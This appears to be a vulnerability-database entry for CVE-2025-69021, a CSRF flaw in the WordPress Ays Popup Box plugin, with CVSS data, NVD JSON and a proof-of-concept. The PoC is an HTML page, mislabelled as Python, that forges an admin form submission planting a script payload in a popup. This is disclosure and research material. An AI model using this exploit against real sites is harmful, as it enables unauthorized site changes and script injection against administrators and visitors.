Security Vulnerability Report
中文
CVE-2025-69021 CVSS 5.4 MEDIUM

CVE-2025-69021

Published: 2025-12-30 11:16:01
Last Modified: 2026-04-27 20:16:25

Description

Cross-Site Request Forgery (CSRF) vulnerability in Ays Pro Popup box ays-popup-box allows Cross Site Request Forgery.This issue affects Popup box: from n/a through <= 6.0.7.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

ays-popup-box <= 6.0.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-69021 - ays-popup-box plugin --> <!-- This PoC demonstrates a CSRF attack that could modify popup settings --> <!DOCTYPE html> <html> <head> <title>CSRF PoC - CVE-2025-69021</title> </head> <body> <h1>CSRF PoC for WordPress ays-popup-box Plugin</h1> <p>Click the button below to trigger the CSRF attack (modifies popup settings)</p> <!-- Form to modify popup settings via CSRF --> <form action="http://target-site/wp-admin/admin-post.php" method="POST" id="csrfForm"> <input type="hidden" name="action" value="ays_popup_save"> <input type="hidden" name="ays_popup_name" value="Malicious Popup"> <input type="hidden" name="ays_popup_content" value="<script>alert('XSS via CSRF')</script>"> <input type="hidden" name="ays_popup_width" value="100%"> <input type="hidden" name="ays_popup_height" value="auto"> <input type="hidden" name="ays_popup_autoclose" value="5"> <button type="submit" style="display:none;">Submit</button> </form> <script> // Auto-submit form on page load (for demonstration) // document.getElementById('csrfForm').submit(); function triggerCSRF() { document.getElementById('csrfForm').submit(); } </script> <button onclick="triggerCSRF()">Execute CSRF Attack</button> <p><strong>Note:</strong> Target must be logged in as WordPress admin for attack to succeed.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69021", "sourceIdentifier": "[email protected]", "published": "2025-12-30T11:16:00.517", "lastModified": "2026-04-27T20:16:25.233", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Ays Pro Popup box ays-popup-box allows Cross Site Request Forgery.This issue affects Popup box: from n/a through <= 6.0.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/ays-popup-box/vulnerability/wordpress-popup-box-plugin-6-0-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}